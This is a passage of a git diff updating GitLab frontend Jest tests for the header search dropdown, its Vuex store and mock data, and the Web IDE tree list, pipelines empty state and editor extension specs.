f0e5e182ec4..a65b4d8b813 100644 --- a/spec/frontend/header_search/components/header_search_scoped_items_spec.js +++ b/spec/frontend/header_search/components/header_search_scoped_items_spec.js @@ -11,7 +11,7 @@ Vue.use(Vuex); describe('HeaderSearchScopedItems', () => { let wrapper; - const createComponent = (initialState) => { + const createComponent = (initialState, props) => { const store = new Vuex.Store({ state: { search: MOCK_SEARCH, @@ -24,6 +24,9 @@ describe('HeaderSearchScopedItems', () => { wrapper = shallowMount(HeaderSearchScopedItems, { store, + propsData: { + ...props, + }, }); }; @@ -32,7 +35,10 @@ describe('HeaderSearchScopedItems', () => { }); const findDropdownItems = () => wrapper.findAllComponents(GlDropdownItem); + const findFirstDropdownItem = () => findDropdownItems().at(0); 
const findDropdownItemTitles = () => findDropdownItems().wrappers.map((w) => trimText(w.text())); + const findDropdownItemAriaLabels = () => + findDropdownItems().wrappers.map((w) => trimText(w.attributes('aria-label'))); const findDropdownItemLinks = () => findDropdownItems().wrappers.map((w) => w.attributes('href')); describe('template', () => { @@ -52,10 +58,38 @@ describe('HeaderSearchScopedItems', () => { expect(findDropdownItemTitles()).toStrictEqual(expectedTitles); }); + it('renders aria-labels correctly', () => { + const expectedLabels = MOCK_SCOPED_SEARCH_OPTIONS.map((o) => + trimText(`${MOCK_SEARCH} ${o.description} ${o.scope || ''}`), + ); + expect(findDropdownItemAriaLabels()).toStrictEqual(expectedLabels); + }); + it('renders links correctly', () => { const expectedLinks = MOCK_SCOPED_SEARCH_OPTIONS.map((o) => o.url); expect(findDropdownItemLinks()).toStrictEqual(expectedLinks); }); }); + + describe.each` + currentFocusedOption | isFocused | ariaSelected + ${null} | ${false} | ${undefined} + ${{ html_id: 'not-a-match' }} | ${false} | ${undefined} + ${MOCK_SCOPED_SEARCH_OPTIONS[0]} | ${true} | ${'true'} + `('isOptionFocused', ({ currentFocusedOption, isFocused, ariaSelected }) => { + describe(`when currentFocusedOption.html_id is ${currentFocusedOption?.html_id}`, () => { + beforeEach(() => { + createComponent({}, { currentFocusedOption }); + }); + + it(`should${isFocused ? 
'' : ' not'} have gl-bg-gray-50 applied`, () => { + expect(findFirstDropdownItem().classes('gl-bg-gray-50')).toBe(isFocused); + }); + + it(`sets "aria-selected to ${ariaSelected}`, () => { + expect(findFirstDropdownItem().attributes('aria-selected')).toBe(ariaSelected); + }); + }); + }); }); }); diff --git a/spec/frontend/header_search/mock_data.js b/spec/frontend/header_search/mock_data.js index 915b3a4a678..1d980679547 100644 --- a/spec/frontend/header_search/mock_data.js +++ b/spec/frontend/header_search/mock_data.js @@ -46,22 +46,27 @@ export const MOCK_SEARCH_CONTEXT = { export const MOCK_DEFAULT_SEARCH_OPTIONS = [ { + html_id: 'default-issues-assigned', title: MSG_ISSUES_ASSIGNED_TO_ME, url: `${MOCK_ISSUE_PATH}/?assignee_username=${MOCK_USERNAME}`, }, { + html_id: 'default-issues-created', title: MSG_ISSUES_IVE_CREATED, url: `${MOCK_ISSUE_PATH}/?author_username=${MOCK_USERNAME}`, }, { + html_id: 'default-mrs-assigned', title: MSG_MR_ASSIGNED_TO_ME, url: `${MOCK_MR_PATH}/?assignee_username=${MOCK_USERNAME}`, }, { + html_id: 'default-mrs-reviewer', title: MSG_MR_IM_REVIEWER, url: `${MOCK_MR_PATH}/?reviewer_username=${MOCK_USERNAME}`, }, { + html_id: 'default-mrs-created', title: MSG_MR_IVE_CREATED, url: `${MOCK_MR_PATH}/?author_username=${MOCK_USERNAME}`, }, @@ -69,22 +74,25 @@ export const MOCK_DEFAULT_SEARCH_OPTIONS = [ export const MOCK_SCOPED_SEARCH_OPTIONS = [ { + html_id: 'scoped-in-project', scope: MOCK_PROJECT.name, description: MSG_IN_PROJECT, url: MOCK_PROJECT.path, }, { + html_id: 'scoped-in-group', scope: MOCK_GROUP.name, description: MSG_IN_GROUP, url: MOCK_GROUP.path, }, { + html_id: 'scoped-in-all', description: MSG_IN_ALL_GITLAB, url: MOCK_ALL_PATH, }, ]; -export const MOCK_AUTOCOMPLETE_OPTIONS = [ +export const MOCK_AUTOCOMPLETE_OPTIONS_RES = [ { category: 'Projects', id: 1, @@ -92,19 +100,49 @@ export const MOCK_AUTOCOMPLETE_OPTIONS = [ url: 'project/1', }, { + category: 'Groups', + id: 1, + label: 'MockGroup1', + url: 'group/1', + }, + { 
category: 'Projects', id: 2, label: 'MockProject2', url: 'project/2', }, { + category: 'Help', + label: 'GitLab Help', + url: 'help/gitlab', + }, +]; + +export const MOCK_AUTOCOMPLETE_OPTIONS = [ + { + category: 'Projects', + html_id: 'autocomplete-Projects-0', + id: 1, + label: 'MockProject1', + url: 'project/1', + }, + { category: 'Groups', + html_id: 'autocomplete-Groups-1', id: 1, label: 'MockGroup1', url: 'group/1', }, { + category: 'Projects', + html_id: 'autocomplete-Projects-2', + id: 2, + label: 'MockProject2', + url: 'project/2', + }, + { category: 'Help', + html_id: 'autocomplete-Help-3', label: 'GitLab Help', url: 'help/gitlab', }, @@ -116,12 +154,16 @@ export const MOCK_GROUPED_AUTOCOMPLETE_OPTIONS = [ data: [ { category: 'Projects', + html_id: 'autocomplete-Projects-0', + id: 1, label: 'MockProject1', url: 'project/1', }, { category: 'Projects', + html_id: 'autocomplete-Projects-2', + id: 2, label: 'MockProject2', url: 'project/2', @@ -133,6 +175,8 @@ export const MOCK_GROUPED_AUTOCOMPLETE_OPTIONS = [ data: [ { category: 'Groups', + html_id: 'autocomplete-Groups-1', + id: 1, label: 'MockGroup1', url: 'group/1', @@ -144,9 +188,41 @@ export const MOCK_GROUPED_AUTOCOMPLETE_OPTIONS = [ data: [ { category: 'Help', + html_id: 'autocomplete-Help-3', + label: 'GitLab Help', url: 'help/gitlab', }, ], }, ]; + +export const MOCK_SORTED_AUTOCOMPLETE_OPTIONS = [ + { + category: 'Projects', + html_id: 'autocomplete-Projects-0', + id: 1, + label: 'MockProject1', + url: 'project/1', + }, + { + category: 'Projects', + html_id: 'autocomplete-Projects-2', + id: 2, + label: 'MockProject2', + url: 'project/2', + }, + { + category: 'Groups', + html_id: 'autocomplete-Groups-1', + id: 1, + label: 'MockGroup1', + url: 'group/1', + }, + { + category: 'Help', + html_id: 'autocomplete-Help-3', + label: 'GitLab Help', + url: 'help/gitlab', + }, +]; diff --git a/spec/frontend/header_search/store/actions_spec.js b/spec/frontend/header_search/store/actions_spec.js index 
ee2c72df77b..6599115f017 100644 --- a/spec/frontend/header_search/store/actions_spec.js +++ b/spec/frontend/header_search/store/actions_spec.js @@ -5,7 +5,7 @@ import * as actions from '~/header_search/store/actions'; import * as types from '~/header_search/store/mutation_types'; import createState from '~/header_search/store/state'; import axios from '~/lib/utils/axios_utils'; -import { MOCK_SEARCH, MOCK_AUTOCOMPLETE_OPTIONS } from '../mock_data'; +import { MOCK_SEARCH, MOCK_AUTOCOMPLETE_OPTIONS_RES } from '../mock_data'; jest.mock('~/flash'); @@ -29,9 +29,9 @@ describe('Header Search Store Actions', () => { }); describe.each` - axiosMock | type | expectedMutations | flashCallCount - ${{ method: 'onGet', code: 200, res: MOCK_AUTOCOMPLETE_OPTIONS }} | ${'success'} | ${[{ type: types.REQUEST_AUTOCOMPLETE }, { type: types.RECEIVE_AUTOCOMPLETE_SUCCESS, payload: MOCK_AUTOCOMPLETE_OPTIONS }]} | ${0} - ${{ method: 'onGet', code: 500, res: null }} | ${'error'} | ${[{ type: types.REQUEST_AUTOCOMPLETE }, { type: types.RECEIVE_AUTOCOMPLETE_ERROR }]} | ${1} + axiosMock | type | expectedMutations | flashCallCount + ${{ method: 'onGet', code: 200, res: MOCK_AUTOCOMPLETE_OPTIONS_RES }} | ${'success'} | ${[{ type: types.REQUEST_AUTOCOMPLETE }, { type: types.RECEIVE_AUTOCOMPLETE_SUCCESS, payload: MOCK_AUTOCOMPLETE_OPTIONS_RES }]} | ${0} + ${{ method: 'onGet', code: 500, res: null }} | ${'error'} | ${[{ type: types.REQUEST_AUTOCOMPLETE }, { type: types.RECEIVE_AUTOCOMPLETE_ERROR }]} | ${1} `('fetchAutocompleteOptions', ({ axiosMock, type, expectedMutations, flashCallCount }) => { describe(`on ${type}`, () => { beforeEach(() => { @@ -47,6 +47,16 @@ describe('Header Search Store Actions', () => { }); }); + describe('clearAutocomplete', () => { + it('calls the CLEAR_AUTOCOMPLETE mutation', () => { + return testAction({ + action: actions.clearAutocomplete, + state, + expectedMutations: [{ type: types.CLEAR_AUTOCOMPLETE }], + }); + }); + }); + describe('setSearch', () => { it('calls the 
SET_SEARCH mutation', () => { return testAction({ diff --git a/spec/frontend/header_search/store/getters_spec.js b/spec/frontend/header_search/store/getters_spec.js index d55db07188e..35d1bf350d7 100644 --- a/spec/frontend/header_search/store/getters_spec.js +++ b/spec/frontend/header_search/store/getters_spec.js @@ -15,6 +15,7 @@ import { MOCK_SEARCH, MOCK_AUTOCOMPLETE_OPTIONS, MOCK_GROUPED_AUTOCOMPLETE_OPTIONS, + MOCK_SORTED_AUTOCOMPLETE_OPTIONS, } from '../mock_data'; describe('Header Search Store Getters', () => { @@ -36,18 +37,20 @@ describe('Header Search Store Getters', () => { }); describe.each` - group | project | expectedPath - ${null} | ${null} | ${`${MOCK_SEARCH_PATH}?search=${MOCK_SEARCH}&nav_source=navbar&project_id=undefined&group_id=undefined&scope=issues`} - ${MOCK_GROUP} | ${null} | ${`${MOCK_SEARCH_PATH}?search=${MOCK_SEARCH}&nav_source=navbar&project_id=undefined&group_id=${MOCK_GROUP.id}&scope=issues`} - ${MOCK_GROUP} | ${MOCK_PROJECT} | ${`${MOCK_SEARCH_PATH}?search=${MOCK_SEARCH}&nav_source=navbar&project_id=${MOCK_PROJECT.id}&group_id=${MOCK_GROUP.id}&scope=issues`} - `('searchQuery', ({ group, project, expectedPath }) => { - describe(`when group is ${group?.name} and project is ${project?.name}`, () => { + group | project | scope | expectedPath + ${null} | ${null} | ${null} | ${`${MOCK_SEARCH_PATH}?search=${MOCK_SEARCH}&nav_source=navbar`} + ${MOCK_GROUP} | ${null} | ${null} | ${`${MOCK_SEARCH_PATH}?search=${MOCK_SEARCH}&nav_source=navbar&group_id=${MOCK_GROUP.id}`} + ${null} | ${MOCK_PROJECT} | ${null} | ${`${MOCK_SEARCH_PATH}?search=${MOCK_SEARCH}&nav_source=navbar&project_id=${MOCK_PROJECT.id}`} + ${MOCK_GROUP} | ${MOCK_PROJECT} | ${null} | ${`${MOCK_SEARCH_PATH}?search=${MOCK_SEARCH}&nav_source=navbar&project_id=${MOCK_PROJECT.id}&group_id=${MOCK_GROUP.id}`} + ${MOCK_GROUP} | ${MOCK_PROJECT} | ${'issues'} | 
${`${MOCK_SEARCH_PATH}?search=${MOCK_SEARCH}&nav_source=navbar&project_id=${MOCK_PROJECT.id}&group_id=${MOCK_GROUP.id}&scope=issues`} + `('searchQuery', ({ group, project, scope, expectedPath }) => { + describe(`when group is ${group?.name}, project is ${project?.name}, and scope is ${scope}`, () => { beforeEach(() => { createState({ searchContext: { group, project, - scope: 'issues', + scope, }, }); state.search = MOCK_SEARCH; @@ -61,8 +64,9 @@ describe('Header Search Store Getters', () => { describe.each` project | ref | expectedPath - ${null} | ${null} | ${`${MOCK_AUTOCOMPLETE_PATH}?term=${MOCK_SEARCH}&project_id=undefined&project_ref=null`} - ${MOCK_PROJECT} | ${null} | ${`${MOCK_AUTOCOMPLETE_PATH}?term=${MOCK_SEARCH}&project_id=${MOCK_PROJECT.id}&project_ref=null`} + ${null} | ${null} | ${`${MOCK_AUTOCOMPLETE_PATH}?term=${MOCK_SEARCH}`} + ${MOCK_PROJECT} | ${null} | ${`${MOCK_AUTOCOMPLETE_PATH}?term=${MOCK_SEARCH}&project_id=${MOCK_PROJECT.id}`} + ${null} | ${MOCK_PROJECT.id} | ${`${MOCK_AUTOCOMPLETE_PATH}?term=${MOCK_SEARCH}&project_ref=${MOCK_PROJECT.id}`} ${MOCK_PROJECT} | ${MOCK_PROJECT.id} | ${`${MOCK_AUTOCOMPLETE_PATH}?term=${MOCK_SEARCH}&project_id=${MOCK_PROJECT.id}&project_ref=${MOCK_PROJECT.id}`} `('autocompleteQuery', ({ project, ref, expectedPath }) => { describe(`when project is ${project?.name} and project ref is ${ref}`, () => { @@ -131,18 +135,20 @@ describe('Header Search Store Getters', () => { }); describe.each` - group | project | expectedPath - ${null} | ${null} | ${null} - ${MOCK_GROUP} | ${null} | ${null} - ${MOCK_GROUP} | ${MOCK_PROJECT} | ${`${MOCK_SEARCH_PATH}?search=${MOCK_SEARCH}&nav_source=navbar&project_id=${MOCK_PROJECT.id}&group_id=${MOCK_GROUP.id}&scope=issues`} - `('projectUrl', ({ group, project, expectedPath }) => { - describe(`when group is ${group?.name} and project is ${project?.name}`, () => { + group | project | scope | expectedPath + ${null} | ${null} | ${null} | 
${`${MOCK_SEARCH_PATH}?search=${MOCK_SEARCH}&nav_source=navbar`} + ${MOCK_GROUP} | ${null} | ${null} | ${`${MOCK_SEARCH_PATH}?search=${MOCK_SEARCH}&nav_source=navbar&group_id=${MOCK_GROUP.id}`} + ${null} | ${MOCK_PROJECT} | ${null} | ${`${MOCK_SEARCH_PATH}?search=${MOCK_SEARCH}&nav_source=navbar&project_id=${MOCK_PROJECT.id}`} + ${MOCK_GROUP} | ${MOCK_PROJECT} | ${null} | ${`${MOCK_SEARCH_PATH}?search=${MOCK_SEARCH}&nav_source=navbar&project_id=${MOCK_PROJECT.id}&group_id=${MOCK_GROUP.id}`} + ${MOCK_GROUP} | ${MOCK_PROJECT} | ${'issues'} | ${`${MOCK_SEARCH_PATH}?search=${MOCK_SEARCH}&nav_source=navbar&project_id=${MOCK_PROJECT.id}&group_id=${MOCK_GROUP.id}&scope=issues`} + `('projectUrl', ({ group, project, scope, expectedPath }) => { + describe(`when group is ${group?.name}, project is ${project?.name}, and scope is ${scope}`, () => { beforeEach(() => { createState({ searchContext: { group, project, - scope: 'issues', + scope, }, }); state.search = MOCK_SEARCH; @@ -155,18 +161,20 @@ describe('Header Search Store Getters', () => { }); describe.each` - group | project | expectedPath - ${null} | ${null} | ${null} - ${MOCK_GROUP} | ${null} | ${`${MOCK_SEARCH_PATH}?search=${MOCK_SEARCH}&nav_source=navbar&group_id=${MOCK_GROUP.id}&scope=issues`} - ${MOCK_GROUP} | ${MOCK_PROJECT} | ${`${MOCK_SEARCH_PATH}?search=${MOCK_SEARCH}&nav_source=navbar&group_id=${MOCK_GROUP.id}&scope=issues`} - `('groupUrl', ({ group, project, expectedPath }) => { - describe(`when group is ${group?.name} and project is ${project?.name}`, () => { + group | project | scope | expectedPath + ${null} | ${null} | ${null} | ${`${MOCK_SEARCH_PATH}?search=${MOCK_SEARCH}&nav_source=navbar`} + ${MOCK_GROUP} | ${null} | ${null} | ${`${MOCK_SEARCH_PATH}?search=${MOCK_SEARCH}&nav_source=navbar&group_id=${MOCK_GROUP.id}`} + ${null} | ${MOCK_PROJECT} | ${null} | ${`${MOCK_SEARCH_PATH}?search=${MOCK_SEARCH}&nav_source=navbar`} + ${MOCK_GROUP} | ${MOCK_PROJECT} | ${null} | 
${`${MOCK_SEARCH_PATH}?search=${MOCK_SEARCH}&nav_source=navbar&group_id=${MOCK_GROUP.id}`} + ${MOCK_GROUP} | ${MOCK_PROJECT} | ${'issues'} | ${`${MOCK_SEARCH_PATH}?search=${MOCK_SEARCH}&nav_source=navbar&group_id=${MOCK_GROUP.id}&scope=issues`} + `('groupUrl', ({ group, project, scope, expectedPath }) => { + describe(`when group is ${group?.name}, project is ${project?.name}, and scope is ${scope}`, () => { beforeEach(() => { createState({ searchContext: { group, project, - scope: 'issues', + scope, }, }); state.search = MOCK_SEARCH; @@ -178,20 +186,29 @@ describe('Header Search Store Getters', () => { }); }); - describe('allUrl', () => { - const expectedPath = `${MOCK_SEARCH_PATH}?search=${MOCK_SEARCH}&nav_source=navbar&scope=issues`; - - beforeEach(() => { - createState({ - searchContext: { - scope: 'issues', - }, + describe.each` + group | project | scope | expectedPath + ${null} | ${null} | ${null} | ${`${MOCK_SEARCH_PATH}?search=${MOCK_SEARCH}&nav_source=navbar`} + ${MOCK_GROUP} | ${null} | ${null} | ${`${MOCK_SEARCH_PATH}?search=${MOCK_SEARCH}&nav_source=navbar`} + ${null} | ${MOCK_PROJECT} | ${null} | ${`${MOCK_SEARCH_PATH}?search=${MOCK_SEARCH}&nav_source=navbar`} + ${MOCK_GROUP} | ${MOCK_PROJECT} | ${null} | ${`${MOCK_SEARCH_PATH}?search=${MOCK_SEARCH}&nav_source=navbar`} + ${MOCK_GROUP} | ${MOCK_PROJECT} | ${'issues'} | ${`${MOCK_SEARCH_PATH}?search=${MOCK_SEARCH}&nav_source=navbar&scope=issues`} + `('allUrl', ({ group, project, scope, expectedPath }) => { + describe(`when group is ${group?.name}, project is ${project?.name}, and scope is ${scope}`, () => { + beforeEach(() => { + createState({ + searchContext: { + group, + project, + scope, + }, + }); + state.search = MOCK_SEARCH; }); - state.search = MOCK_SEARCH; - }); - it(`should return ${expectedPath}`, () => { - expect(getters.allUrl(state)).toBe(expectedPath); + it(`should return ${expectedPath}`, () => { + expect(getters.allUrl(state)).toBe(expectedPath); + }); }); }); @@ -248,4 +265,44 @@ 
describe('Header Search Store Getters', () => { ); }); }); + + describe.each` + search | defaultSearchOptions | scopedSearchOptions | autocompleteGroupedSearchOptions | expectedArray + ${null} | ${MOCK_DEFAULT_SEARCH_OPTIONS} | ${MOCK_SCOPED_SEARCH_OPTIONS} | ${MOCK_GROUPED_AUTOCOMPLETE_OPTIONS} | ${MOCK_DEFAULT_SEARCH_OPTIONS} + ${MOCK_SEARCH} | ${MOCK_DEFAULT_SEARCH_OPTIONS} | ${MOCK_SCOPED_SEARCH_OPTIONS} | ${[]} | ${MOCK_SCOPED_SEARCH_OPTIONS} + ${MOCK_SEARCH} | ${MOCK_DEFAULT_SEARCH_OPTIONS} | ${[]} | ${MOCK_GROUPED_AUTOCOMPLETE_OPTIONS} | ${MOCK_SORTED_AUTOCOMPLETE_OPTIONS} + ${MOCK_SEARCH} | ${MOCK_DEFAULT_SEARCH_OPTIONS} | ${MOCK_SCOPED_SEARCH_OPTIONS} | ${MOCK_GROUPED_AUTOCOMPLETE_OPTIONS} | ${MOCK_SCOPED_SEARCH_OPTIONS.concat(MOCK_SORTED_AUTOCOMPLETE_OPTIONS)} + `( + 'searchOptions', + ({ + search, + defaultSearchOptions, + scopedSearchOptions, + autocompleteGroupedSearchOptions, + expectedArray, + }) => { + describe(`when search is ${search} and the defaultSearchOptions${ + defaultSearchOptions.length ? '' : ' do not' + } exist, scopedSearchOptions${ + scopedSearchOptions.length ? '' : ' do not' + } exist, and autocompleteGroupedSearchOptions${ + autocompleteGroupedSearchOptions.length ? 
'' : ' do not' + } exist`, () => { + const mockGetters = { + defaultSearchOptions, + scopedSearchOptions, + autocompleteGroupedSearchOptions, + }; + + beforeEach(() => { + createState(); + state.search = search; + }); + + it(`should return the correct combined array`, () => { + expect(getters.searchOptions(state, mockGetters)).toStrictEqual(expectedArray); + }); + }); + }, + ); }); diff --git a/spec/frontend/header_search/store/mutations_spec.js b/spec/frontend/header_search/store/mutations_spec.js index 7f9b7631a7e..7bcf8e49118 100644 --- a/spec/frontend/header_search/store/mutations_spec.js +++ b/spec/frontend/header_search/store/mutations_spec.js @@ -1,7 +1,11 @@ import * as types from '~/header_search/store/mutation_types'; import mutations from '~/header_search/store/mutations'; import createState from '~/header_search/store/state'; -import { MOCK_SEARCH, MOCK_AUTOCOMPLETE_OPTIONS } from '../mock_data'; +import { + MOCK_SEARCH, + MOCK_AUTOCOMPLETE_OPTIONS_RES, + MOCK_AUTOCOMPLETE_OPTIONS, +} from '../mock_data'; describe('Header Search Store Mutations', () => { let state; @@ -20,8 +24,8 @@ describe('Header Search Store Mutations', () => { }); describe('RECEIVE_AUTOCOMPLETE_SUCCESS', () => { - it('sets loading to false and sets autocompleteOptions array', () => { - mutations[types.RECEIVE_AUTOCOMPLETE_SUCCESS](state, MOCK_AUTOCOMPLETE_OPTIONS); + it('sets loading to false and then formats and sets the autocompleteOptions array', () => { + mutations[types.RECEIVE_AUTOCOMPLETE_SUCCESS](state, MOCK_AUTOCOMPLETE_OPTIONS_RES); expect(state.loading).toBe(false); expect(state.autocompleteOptions).toStrictEqual(MOCK_AUTOCOMPLETE_OPTIONS); @@ -37,6 +41,14 @@ describe('Header Search Store Mutations', () => { }); }); + describe('CLEAR_AUTOCOMPLETE', () => { + it('empties autocompleteOptions array', () => { + mutations[types.CLEAR_AUTOCOMPLETE](state); + + expect(state.autocompleteOptions).toStrictEqual([]); + }); + }); + describe('SET_SEARCH', () => { it('sets search to 
value', () => { mutations[types.SET_SEARCH](state, MOCK_SEARCH); diff --git a/spec/frontend/ide/components/ide_tree_list_spec.js b/spec/frontend/ide/components/ide_tree_list_spec.js index 85d9feb0c09..ace51204374 100644 --- a/spec/frontend/ide/components/ide_tree_list_spec.js +++ b/spec/frontend/ide/components/ide_tree_list_spec.js @@ -38,9 +38,16 @@ describe('IDE tree list', () => { beforeEach(() => { bootstrapWithTree(); + jest.spyOn(vm, '$emit').mockImplementation(() => {}); + vm.$mount(); }); + it('emits tree-ready event', () => { + expect(vm.$emit).toHaveBeenCalledTimes(1); + expect(vm.$emit).toHaveBeenCalledWith('tree-ready'); + }); + it('renders loading indicator', (done) => { store.state.trees['abcproject/main'].loading = true; @@ -61,9 +68,15 @@ describe('IDE tree list', () => { beforeEach(() => { bootstrapWithTree(emptyBranchTree); + jest.spyOn(vm, '$emit').mockImplementation(() => {}); + vm.$mount(); }); + it('still emits tree-ready event', () => { + expect(vm.$emit).toHaveBeenCalledWith('tree-ready'); + }); + it('does not load files if the branch is empty', () => { expect(vm.$el.textContent).not.toContain('fileName'); expect(vm.$el.textContent).toContain('No files'); diff --git a/spec/frontend/ide/components/pipelines/__snapshots__/list_spec.js.snap b/spec/frontend/ide/components/pipelines/__snapshots__/list_spec.js.snap index 47e3a56e83d..069b6927bac 100644 --- a/spec/frontend/ide/components/pipelines/__snapshots__/list_spec.js.snap +++ b/spec/frontend/ide/components/pipelines/__snapshots__/list_spec.js.snap @@ -6,10 +6,10 @@ exports[`IDE pipelines list when loaded renders empty state when no latestPipeli > <!----> - <empty-state-stub - cansetci="true" - class="gl-p-5" - emptystatesvgpath="http://test.host" - /> + <div + class="gl-h-full gl-display-flex gl-flex-direction-column gl-justify-content-center" + > + <empty-state-stub /> + </div> </div> `; diff --git a/spec/frontend/ide/components/pipelines/empty_state_spec.js 
b/spec/frontend/ide/components/pipelines/empty_state_spec.js new file mode 100644 index 00000000000..f7409fc36be --- /dev/null +++ b/spec/frontend/ide/components/pipelines/empty_state_spec.js @@ -0,0 +1,44 @@ +import { GlEmptyState } from '@gitlab/ui'; +import { shallowMount } from '@vue/test-utils'; +import EmptyState from '~/ide/components/pipelines/empty_state.vue'; +import { createStore } from '~/ide/stores'; + +const TEST_PIPELINES_EMPTY_STATE_SVG_PATH = 'illustrations/test/pipelines.svg'; + +describe('~/ide/components/pipelines/empty_state.vue', () => { + let store; + let wrapper; + + const createComponent = () => { + wrapper = shallowMount(EmptyState, { + store, + }); + }; + + beforeEach(() => { + store = createStore(); + store.dispatch('setEmptyStateSvgs', { + pipelinesEmptyStateSvgPath: TEST_PIPELINES_EMPTY_STATE_SVG_PATH, + }); + }); + + afterEach(() => { + wrapper.destroy(); + }); + + describe('default', () => { + beforeEach(() => { + createComponent(); + }); + + it('renders empty state', () => { + expect(wrapper.find(GlEmptyState).props()).toMatchObject({ + title: EmptyState.i18n.title, + description: EmptyState.i18n.description, + primaryButtonText: EmptyState.i18n.primaryButtonText, + primaryButtonLink: '/help/ci/quick_start/index.md', + svgPath: TEST_PIPELINES_EMPTY_STATE_SVG_PATH, + }); + }); + }); +}); diff --git a/spec/frontend/ide/components/pipelines/list_spec.js b/spec/frontend/ide/components/pipelines/list_spec.js index a917f4c0230..8a3606e27eb 100644 --- a/spec/frontend/ide/components/pipelines/list_spec.js +++ b/spec/frontend/ide/components/pipelines/list_spec.js @@ -2,10 +2,10 @@ import { GlLoadingIcon, GlTab } from '@gitlab/ui'; import { shallowMount } from '@vue/test-utils'; import Vue from 'vue'; import Vuex from 'vuex'; -import { TEST_HOST } from 'helpers/test_constants'; import { pipelines } from 'jest/ide/mock_data'; import JobsList from '~/ide/components/jobs/list.vue'; import List from '~/ide/components/pipelines/list.vue'; +import 
EmptyState from '~/ide/components/pipelines/empty_state.vue'; import IDEServices from '~/ide/services'; import CiIcon from '~/vue_shared/components/ci_icon.vue'; @@ -18,9 +18,6 @@ jest.mock('~/ide/services', () => ({ describe('IDE pipelines list', () => { let wrapper; - const defaultState = { - pipelinesEmptyStateSvgPath: TEST_HOST, - }; const defaultPipelinesState = { stages: [], failedStages: [], @@ -38,7 +35,6 @@ describe('IDE pipelines list', () => { currentProject: () => ({ web_url: 'some/url ', path_with_namespace: fakeProjectPath }), }, state: { - ...defaultState, ...rootState, }, modules: { @@ -131,6 +127,8 @@ describe('IDE pipelines list', () => { it('renders empty state when no latestPipeline', () => { createComponent({}, { ...defaultPipelinesLoadedState, latestPipeline: null }); + + expect(wrapper.find(EmptyState).exists()).toBe(true); expect(wrapper.element).toMatchSnapshot(); }); diff --git a/spec/frontend/ide/components/repo_editor_spec.js b/spec/frontend/ide/components/repo_editor_spec.js index c2212eea849..c957c64aa10 100644 --- a/spec/frontend/ide/components/repo_editor_spec.js +++ b/spec/frontend/ide/components/repo_editor_spec.js @@ -9,7 +9,7 @@ import waitUsingRealTimer from 'helpers/wait_using_real_timer'; import { exampleConfigs, exampleFiles } from 'jest/ide/lib/editorconfig/mock_data'; import { EDITOR_CODE_INSTANCE_FN, EDITOR_DIFF_INSTANCE_FN } from '~/editor/constants'; import { EditorMarkdownExtension } from '~/editor/extensions/source_editor_markdown_ext'; -import { EditorWebIdeExtension } from '~/editor/extensions/source_editor_webide_ext'; +import { EditorMarkdownPreviewExtension } from '~/editor/extensions/source_editor_markdown_livepreview_ext'; import SourceEditor from '~/editor/source_editor'; import RepoEditor from '~/ide/components/repo_editor.vue'; import { @@ -23,6 +23,8 @@ import service from '~/ide/services'; import { createStoreOptions } from '~/ide/stores'; import axios from '~/lib/utils/axios_utils'; import ContentViewer 
from '~/vue_shared/components/content_viewer/content_viewer.vue'; +import SourceEditorInstance from '~/editor/source_editor_instance'; +import { spyOnApi } from 'jest/editor/helpers'; import { file } from '../helpers'; const PREVIEW_MARKDOWN_PATH = '/foo/bar/preview_markdown'; @@ -101,6 +103,7 @@ describe('RepoEditor', () => { let createDiffInstanceSpy; let createModelSpy; let applyExtensionSpy; + let extensionsStore; const waitForEditorSetup = () => new Promise((resolve) => { @@ -120,6 +123,7 @@ describe('RepoEditor', () => { }); await waitForPromises(); vm = wrapper.vm; + extensionsStore = wrapper.vm.globalEditor.extensionsStore; jest.spyOn(vm, 'getFileData').mockResolvedValue(); jest.spyOn(vm, 'getRawFileData').mockResolvedValue(); }; @@ -127,28 +131,12 @@ describe('RepoEditor', () => { const findEditor = () => wrapper.find('[data-testid="editor-container"]'); const findTabs = () => wrapper.findAll('.ide-mode-tabs .nav-links li'); const findPreviewTab = () => wrapper.find('[data-testid="preview-tab"]'); - const expectEditorMarkdownExtension = (shouldHaveExtension) => { - if (shouldHaveExtension) { - expect(applyExtensionSpy).toHaveBeenCalledWith( - wrapper.vm.editor, - expect.any(EditorMarkdownExtension), - ); - // TODO: spying on extensions causes Jest to blow up, so we have to assert on - // the public property the extension adds, as opposed to the args passed to the ctor - expect(wrapper.vm.editor.previewMarkdownPath).toBe(PREVIEW_MARKDOWN_PATH); - } else { - expect(applyExtensionSpy).not.toHaveBeenCalledWith( - wrapper.vm.editor, - expect.any(EditorMarkdownExtension), - ); - } - }; beforeEach(() => { createInstanceSpy = jest.spyOn(SourceEditor.prototype, EDITOR_CODE_INSTANCE_FN); createDiffInstanceSpy = jest.spyOn(SourceEditor.prototype, EDITOR_DIFF_INSTANCE_FN); createModelSpy = jest.spyOn(monacoEditor, 'createModel'); - applyExtensionSpy = jest.spyOn(SourceEditor, 'instanceApplyExtension'); + applyExtensionSpy = jest.spyOn(SourceEditorInstance.prototype, 
'use'); jest.spyOn(service, 'getFileData').mockResolvedValue(); jest.spyOn(service, 'getRawFileData').mockResolvedValue(); }); @@ -275,14 +263,13 @@ describe('RepoEditor', () => { ); it('installs the WebIDE extension', async () => { - const extensionSpy = jest.spyOn(SourceEditor, 'instanceApplyExtension'); await createComponent(); - expect(extensionSpy).toHaveBeenCalled(); - Reflect.ownKeys(EditorWebIdeExtension.prototype) - .filter((fn) => fn !== 'constructor') - .forEach((fn) => { - expect(vm.editor[fn]).toBe(EditorWebIdeExtension.prototype[fn]); - }); + expect(applyExtensionSpy).toHaveBeenCalled(); + const ideExtensionApi = extensionsStore.get('EditorWebIde').api; + Reflect.ownKeys(ideExtensionApi).forEach((fn) => { + expect(vm.editor[fn]).toBeDefined(); + expect(vm.editor.methods[fn]).toBe('EditorWebIde'); + }); }); it.each` @@ -301,7 +288,20 @@ describe('RepoEditor', () => { async ({ activeFile, viewer, shouldHaveMarkdownExtension } = {}) => { await createComponent({ state: { viewer }, activeFile }); - expectEditorMarkdownExtension(shouldHaveMarkdownExtension); + if (shouldHaveMarkdownExtension) { + expect(applyExtensionSpy).toHaveBeenCalledWith({ + definition: EditorMarkdownPreviewExtension, + setupOptions: { previewMarkdownPath: PREVIEW_MARKDOWN_PATH }, + }); + // TODO: spying on extensions causes Jest to blow up, so we have to assert on + // the public property the extension adds, as opposed to the args passed to the ctor + expect(wrapper.vm.editor.markdownPreview.path).toBe(PREVIEW_MARKDOWN_PATH); + } else { + expect(applyExtensionSpy).not.toHaveBeenCalledWith( + 